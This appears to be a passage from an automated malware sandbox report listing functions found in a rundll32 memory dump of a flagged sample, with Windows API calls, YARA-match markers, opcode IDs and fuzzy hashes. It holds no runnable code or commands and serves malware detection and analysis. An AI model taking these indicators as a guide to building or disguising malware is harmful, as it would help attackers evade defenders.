                                                                                                                • Instruction Fuzzy Hash: 1D9002A961300003F9827159540860A0015DBD1246F91D416A4006559DCA59D8A96361
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 04449840 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 7640b33c82499b58756dd8ac377fe8c439d01d734614eadf2da4f9da40f9e102
                                                                                                                • Instruction ID: d5b2414f2845ca6aac6476443cae28c40159bbd3872269ad51eaaab2d3db7459
                                                                                                                • Opcode Fuzzy Hash: 7640b33c82499b58756dd8ac377fe8c439d01d734614eadf2da4f9da40f9e102
                                                                                                                • Instruction Fuzzy Hash: CE9002A1642041537D47B15944045074016EBE0285791C013A5405951D866AE896E661
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 04449860 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 059fec18cd66be605819656fa93a5341e06ca0737241a45eed9667047e4d3f5a
                                                                                                                • Instruction ID: 0b212c577ddfff7aedf2f2cbeddfbe38634d2dacc1ea08dc1f11f80c962de539
                                                                                                                • Opcode Fuzzy Hash: 059fec18cd66be605819656fa93a5341e06ca0737241a45eed9667047e4d3f5a
                                                                                                                • Instruction Fuzzy Hash: 979002B160100413F913615945047070019DBD0285F91C413A4415559E979AD992B161
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 04449910 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 9c95fc6d00436066b8ee527bf21d4485f3264186902ec77dd93b68e26e41c9e9
                                                                                                                • Instruction ID: 1eb8bd915a20c35811c215f8eb9d2b04a4118527026c36a7de09aba989cd8380
                                                                                                                • Opcode Fuzzy Hash: 9c95fc6d00436066b8ee527bf21d4485f3264186902ec77dd93b68e26e41c9e9
                                                                                                                • Instruction Fuzzy Hash: BF9002F160100403F942715944047460015DBD0345F51C012A9055555F879DDDD576A5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 044499A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 226708fc63bfd6bbbbab8a90c4986c873df111756ee0f75499d8addf7c7c0741
                                                                                                                • Instruction ID: 7c304c1f8fb8c6f111db10639f8bd1bda439b05a1584986fdf962d71be2d2364
                                                                                                                • Opcode Fuzzy Hash: 226708fc63bfd6bbbbab8a90c4986c873df111756ee0f75499d8addf7c7c0741
                                                                                                                • Instruction Fuzzy Hash: 879002E174100443F90261594414B060015DBE1345F51C016E5055555E875DDC927166
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 04449A50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: e9d7b614fb4e796ed667f444193215b1a93d9ed9970042668b1d20ca08d22a21
                                                                                                                • Instruction ID: e8f8346fc108bbf73746ab83af5f4c35c6205a64eb3fe418f83781b0863f2b57
                                                                                                                • Opcode Fuzzy Hash: e9d7b614fb4e796ed667f444193215b1a93d9ed9970042668b1d20ca08d22a21
                                                                                                                • Instruction Fuzzy Hash: C99002A161180043FA0265694C14B070015DBD0347F51C116A4145555DCA59D8A16561
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 02A58D7F Relevance: 1.5, Strings: 1, Instructions: 220COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830559434.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_2a50000_rundll32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: ErrorMode
                                                                                                                • String ID: T
                                                                                                                • API String ID: 2340568224-3187964512
                                                                                                                • Opcode ID: 923468595e252ed37995e136b072f90d35955601b0ca6d301895b0f66d72ce2c
                                                                                                                • Instruction ID: 021d085939f96aafcbdf5d4d34218d69c88270feb3f477f03e16ec31411567a2
                                                                                                                • Opcode Fuzzy Hash: 923468595e252ed37995e136b072f90d35955601b0ca6d301895b0f66d72ce2c
                                                                                                                • Instruction Fuzzy Hash: 3571A2B1D40229ABDB24EBA4CD84FFFB7B9AF48304F04455DE909A6140EF74A644CFA5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 02A6B520 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 92sleepCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830559434.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_2a50000_rundll32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Sleep
                                                                                                                • String ID: net.dll$wininet.dll
                                                                                                                • API String ID: 3472027048-1269752229
                                                                                                                • Opcode ID: 2747da805f26f4fdcb6dd3168df3107379419432d1557350c203cdac230d03bd
                                                                                                                • Instruction ID: 0da3c458dfa6b756dadbe607955bae25b5fb1fc6febbdbb6043796bd6ea5c607
                                                                                                                • Opcode Fuzzy Hash: 2747da805f26f4fdcb6dd3168df3107379419432d1557350c203cdac230d03bd
                                                                                                                • Instruction Fuzzy Hash: D431D0B5600204ABC314DFA4D8C4FABB7B9EB48304F00891EEA5D9B284DB70B540CFA4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 02A6B512 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 88sleepCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830559434.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_2a50000_rundll32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Sleep
                                                                                                                • String ID: net.dll$wininet.dll
                                                                                                                • API String ID: 3472027048-1269752229
                                                                                                                • Opcode ID: 8abf01825532e3829a8da4888986e2ef519803a57fbca5f9bb910cff8384fed4
                                                                                                                • Instruction ID: 75880e3577efeb27802a75102d4687fb97cf9ca4c46333d40bbe74ef35000158
                                                                                                                • Opcode Fuzzy Hash: 8abf01825532e3829a8da4888986e2ef519803a57fbca5f9bb910cff8384fed4
                                                                                                                • Instruction Fuzzy Hash: 0331E2B5A40200BBC710DFA4D8C4FAAB7B9FB48704F10852DEA5D9B285DB70A544CFE4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 02A5FCF0 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 213COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetFileAttributesW.KERNEL32(?), ref: 02A5FE13
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830559434.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_2a50000_rundll32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: AttributesFile
                                                                                                                • String ID: @
                                                                                                                • API String ID: 3188754299-2766056989
                                                                                                                • Opcode ID: c75c8a8733725f916dd180ed8fdfe1cc8fb8ad1f839478040ee5d9828aa45d69
                                                                                                                • Instruction ID: 82606b17db186f0f32b1f00e5558b7b18088695ea4c311fba50b958796d67ce1
                                                                                                                • Opcode Fuzzy Hash: c75c8a8733725f916dd180ed8fdfe1cc8fb8ad1f839478040ee5d9828aa45d69
                                                                                                                • Instruction Fuzzy Hash: 257172B6940218AADB14DB64CDC8FFBB37DAF55304F04499DEA1997540EF70AA848FA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 02A652A0 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 101COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • CoInitialize.OLE32(00000000,00000000,?,00000000), ref: 02A652B7
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830559434.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_2a50000_rundll32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Initialize
                                                                                                                • String ID: @J7<
                                                                                                                • API String ID: 2538663250-2016760708
                                                                                                                • Opcode ID: 7b0c3516462ecf273618ccf768b219b13983b65ec12c5969ebd10127d3ce62c8
                                                                                                                • Instruction ID: 957dcf00622529a5d214962d99590cfa7743f83dccd005f4c57f13a4139a7020
                                                                                                                • Opcode Fuzzy Hash: 7b0c3516462ecf273618ccf768b219b13983b65ec12c5969ebd10127d3ce62c8
                                                                                                                • Instruction Fuzzy Hash: F73152B5A002099FDB00DFD8C880DEFB7B9BF88304B548599E505EB204EB71EE058BA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 02A6B65D Relevance: 1.6, APIs: 1, Instructions: 118threadCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • CreateThread.KERNEL32(00000000,00000000,-00000002,C53CA26C,00000000,00000000,02A5DDD2,?,?,?,C53CA26C,?), ref: 02A6B6A2
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830559434.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_2a50000_rundll32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CreateThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 2422867632-0
                                                                                                                • Opcode ID: 63cffc8057646771703b2b918938e02e6d5095622fcacee98f2df07312b42859
                                                                                                                • Instruction ID: 82468d062193116029559ffa5e773e98d75a4392151bce3b06b3f0a4ef811a80
                                                                                                                • Opcode Fuzzy Hash: 63cffc8057646771703b2b918938e02e6d5095622fcacee98f2df07312b42859
                                                                                                                • Instruction Fuzzy Hash: 3841C37A240705ABD720DBB4CD85FA7B7ECEF48704F148929E55997280EFB0B9048BB0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 02A5B160 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 02A5B1D2
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830559434.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_2a50000_rundll32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Load
                                                                                                                • String ID:
                                                                                                                • API String ID: 2234796835-0
                                                                                                                • Opcode ID: 45703d29658771d2e758ce812cc2318878c198cdb6def24393dd66e11465bc29
                                                                                                                • Instruction ID: e67e2e2871be9f9d4abe0081d8274d812cf96d352ba0a915fd04943dd32d874e
                                                                                                                • Opcode Fuzzy Hash: 45703d29658771d2e758ce812cc2318878c198cdb6def24393dd66e11465bc29
                                                                                                                • Instruction Fuzzy Hash: EB015EB6E4020DBBDF10DBA0ED85FEEB378AB04308F004594AD0897245FA30E7188BA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 02A6B660 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • CreateThread.KERNEL32(00000000,00000000,-00000002,C53CA26C,00000000,00000000,02A5DDD2,?,?,?,C53CA26C,?), ref: 02A6B6A2
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830559434.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_2a50000_rundll32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CreateThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 2422867632-0
                                                                                                                • Opcode ID: 7284f78e8efd79d6eb8b6eff5295497387e90f78f958a5c573c1c0cba29408d7
                                                                                                                • Instruction ID: c6a0db9e16e90c8952c6fd03de2784942f624436d00f833a47a8be9b25c6649a
                                                                                                                • Opcode Fuzzy Hash: 7284f78e8efd79d6eb8b6eff5295497387e90f78f958a5c573c1c0cba29408d7
                                                                                                                • Instruction Fuzzy Hash: 34F065737C021436E33061A99C02FA7B68CDB84B61F140425FA0CEA1C0D992B84146B4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 02A6CA66 Relevance: 1.5, APIs: 1, Instructions: 34memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • RtlAllocateHeap.NTDLL(02A66EF6,?,02A6769D,02A6769D,?,02A66EF6,00000000,?,?,?,?,00000000,00000000,00000002), ref: 02A6CACD
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830559434.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_2a50000_rundll32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: AllocateHeap
                                                                                                                • String ID:
                                                                                                                • API String ID: 1279760036-0
                                                                                                                • Opcode ID: 9e1a41605c31e1fdb1ff82717fb12ee4eb470cb8c77884a2e9982f4e52823742
                                                                                                                • Instruction ID: 0436100681434c218241d099b1f03f1345cc05a2557841064cbc5f9cd1351777
                                                                                                                • Opcode Fuzzy Hash: 9e1a41605c31e1fdb1ff82717fb12ee4eb470cb8c77884a2e9982f4e52823742
                                                                                                                • Instruction Fuzzy Hash: 4CF08CB2300210ABDB14EF88DC88FE7376DEF88360F004595FA4C5B241CA31EA148BE1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 02A6CC31 Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,02A5E132,02A5E132,?,00000000,?,?), ref: 02A6CC70
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830559434.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_2a50000_rundll32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: LookupPrivilegeValue
                                                                                                                • String ID:
                                                                                                                • API String ID: 3899507212-0
                                                                                                                • Opcode ID: d56fa351db191d850623d20d7ddaf1a6fedee4e115c235648d2168102584005f
                                                                                                                • Instruction ID: e026861911a8de6548c536176bfa1269e0ca8ada53ac74f98e670072ba037ab1
                                                                                                                • Opcode Fuzzy Hash: d56fa351db191d850623d20d7ddaf1a6fedee4e115c235648d2168102584005f
                                                                                                                • Instruction Fuzzy Hash: 22F0A0B13002006FC714EF48CD48EEB3B6AEF89264F004565BA199B2D2C630A900CBA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 02A6CAD2 Relevance: 1.5, APIs: 1, Instructions: 28memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • RtlFreeHeap.NTDLL(00000060,00000000,?,?,00000000,00000060,00000000,00000000,?,?,6398FDE0,00000000,?), ref: 02A6CB0D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830559434.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_2a50000_rundll32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: FreeHeap
                                                                                                                • String ID:
                                                                                                                • API String ID: 3298025750-0
                                                                                                                • Opcode ID: 2ad19adb4b3b4a43350aec6113856beb05182e5fadc562b3f11d9296fbcda626
                                                                                                                • Instruction ID: 9b77708acdf234e4d75eb50c668d4a9e4ff1c46a661dec68c30332442c74d472
                                                                                                                • Opcode Fuzzy Hash: 2ad19adb4b3b4a43350aec6113856beb05182e5fadc562b3f11d9296fbcda626
                                                                                                                • Instruction Fuzzy Hash: 20F03071340114AFC725DF55DC88E9B3769EF85350F104154F90997681CA30E911CFA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 02A5E7DA Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetFileAttributesW.KERNEL32(0000B1E8,?,?,?,?,?), ref: 02A5E80A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830559434.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_2a50000_rundll32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: AttributesFile
                                                                                                                • String ID:
                                                                                                                • API String ID: 3188754299-0
                                                                                                                • Opcode ID: 4cbd92ae62ce90e23540b8ab90ab455226c8b3edca32fe9eac00b5f1df1e8dcc
                                                                                                                • Instruction ID: e941c3301a370680a4c9e9fc332d4fcea54faaa0f9b6eb27322e9df58ee8e634
                                                                                                                • Opcode Fuzzy Hash: 4cbd92ae62ce90e23540b8ab90ab455226c8b3edca32fe9eac00b5f1df1e8dcc
                                                                                                                • Instruction Fuzzy Hash: CDE0D8715001002BF728DB78CDC6FA633149B48314F188250FC18DB2C1DB78E6428650
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 02A5E5D7 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SetErrorMode.KERNEL32(00008003,?,?,02A58D9A,?), ref: 02A5E611
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830559434.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_2a50000_rundll32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: ErrorMode
                                                                                                                • String ID:
                                                                                                                • API String ID: 2340568224-0
                                                                                                                • Opcode ID: c4be43d5b1d1ed309549c36e52a326543e82f10c192bc19e5eb0616a195c4b29
                                                                                                                • Instruction ID: b1a3adfc4223ede93a211311da90249f355993b5b61fe09c1c242c7f619a5d41
                                                                                                                • Opcode Fuzzy Hash: c4be43d5b1d1ed309549c36e52a326543e82f10c192bc19e5eb0616a195c4b29
                                                                                                                • Instruction Fuzzy Hash: F9E0C276AD43057EF710ABB4AD82FB777A99F45744F0602A8F94CDA2C2CD71A1408614
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 02A6CAA0 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • RtlAllocateHeap.NTDLL(02A66EF6,?,02A6769D,02A6769D,?,02A66EF6,00000000,?,?,?,?,00000000,00000000,00000002), ref: 02A6CACD
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830559434.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_2a50000_rundll32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: AllocateHeap
                                                                                                                • String ID:
                                                                                                                • API String ID: 1279760036-0
                                                                                                                • Opcode ID: bededf418e3a0274c804535d3b84133155b4e078891fc5e6f2d2b0bfe9395de7
                                                                                                                • Instruction ID: fa7e1749a07efe583b23bba0ae63b51157507a70d22f51bf86e429f0701303a3
                                                                                                                • Opcode Fuzzy Hash: bededf418e3a0274c804535d3b84133155b4e078891fc5e6f2d2b0bfe9395de7
                                                                                                                • Instruction Fuzzy Hash: CEE04FB13002046BC714DF49DC44EA737ADEF88754F018054FE095B241C630F910CAF1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 02A6CAE0 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • RtlFreeHeap.NTDLL(00000060,00000000,?,?,00000000,00000060,00000000,00000000,?,?,6398FDE0,00000000,?), ref: 02A6CB0D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830559434.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_2a50000_rundll32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: FreeHeap
                                                                                                                • String ID:
                                                                                                                • API String ID: 3298025750-0
                                                                                                                • Opcode ID: 23a076b226fe51778b5763cad65316f8bf1a978e6f8bf853b8ff448c05f6660e
                                                                                                                • Instruction ID: eaef9c9808506682d4f4ab4f767d5cdba14228a0d9c64277be8e8de74bdf9981
                                                                                                                • Opcode Fuzzy Hash: 23a076b226fe51778b5763cad65316f8bf1a978e6f8bf853b8ff448c05f6660e
                                                                                                                • Instruction Fuzzy Hash: 32E01AB12002046BCB14DF49DC48EA737ADEF88750F014054B90957281C630F910CAB1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 02A5E7E0 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetFileAttributesW.KERNEL32(0000B1E8,?,?,?,?,?), ref: 02A5E80A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830559434.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_2a50000_rundll32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: AttributesFile
                                                                                                                • String ID:
                                                                                                                • API String ID: 3188754299-0
                                                                                                                • Opcode ID: feda4e524e1d26274cfde58d8cbcd7d602172331b1f8e84671833b0d1dc5bbc0
                                                                                                                • Instruction ID: 0b7f29495c3ae1f62c05c1bf68e135ddea9017dbc33c49a0c7eb6d3c179d54c5
                                                                                                                • Opcode Fuzzy Hash: feda4e524e1d26274cfde58d8cbcd7d602172331b1f8e84671833b0d1dc5bbc0
                                                                                                                • Instruction Fuzzy Hash: 74E0C271A5031427FB2C67A8CDC6F7733588B4C728F188650FD189B2C2DB78F6418294
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 02A6CC40 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,02A5E132,02A5E132,?,00000000,?,?), ref: 02A6CC70
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830559434.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_2a50000_rundll32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: LookupPrivilegeValue
                                                                                                                • String ID:
                                                                                                                • API String ID: 3899507212-0
                                                                                                                • Opcode ID: fcd9c8699ba7664216ee9c99a80c6681bfd3f6b1868cf2e6b0f001b81709f581
                                                                                                                • Instruction ID: 4308d0091692ce8eb29a7dcfb958a64b49e7e74a21f2511291ccbc12edd33f46
                                                                                                                • Opcode Fuzzy Hash: fcd9c8699ba7664216ee9c99a80c6681bfd3f6b1868cf2e6b0f001b81709f581
                                                                                                                • Instruction Fuzzy Hash: EFE01AB12002086BC714DF49CC44EE737ADEF88754F014054BA0957241C631F8108AB1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 02A5E5E0 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SetErrorMode.KERNEL32(00008003,?,?,02A58D9A,?), ref: 02A5E611
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830559434.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_2a50000_rundll32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: ErrorMode
                                                                                                                • String ID:
                                                                                                                • API String ID: 2340568224-0
                                                                                                                • Opcode ID: ba33e17987b3b042a61960e4377636ba2bbf7f1f6027373fe847ed05d9128245
